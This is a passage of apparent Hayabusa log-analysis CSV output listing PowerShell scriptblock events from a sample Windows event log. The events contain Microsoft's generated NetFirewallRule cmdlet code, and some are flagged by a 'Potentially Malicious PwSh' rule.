[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:DynamicTransport'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DynamicTransport'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Program')) { [object]$__cmdletization_value = ${Program} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Program'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Package')) { [object]$__cmdletization_value = ${Package} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Package'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Service'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType';,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalUser')) { [object]$__cmdletization_value = ${LocalUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteUser')) { [object]$__cmdletization_value = ${RemoteUser} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteUser'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteMachine')) { [object]$__cmdletization_value = ${RemoteMachine} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteMachine'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Authentication')) { [object]$__cmdletization_value = ${Authentication} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Authentication'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Authentication'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Encryption')) { [object]$__cmdletization_value = ${Encryption} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Encryption'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Encryption'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OverrideBlockRules')) { [object]$__cmdletization_value = ${OverrideBlockRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:OverrideBlockRules'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetFirewallRule' -Alias '*' function Show-NetFirewallRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] [string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx
+2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Dependents'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetFirewallRule' -Alias '*' function Get-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] 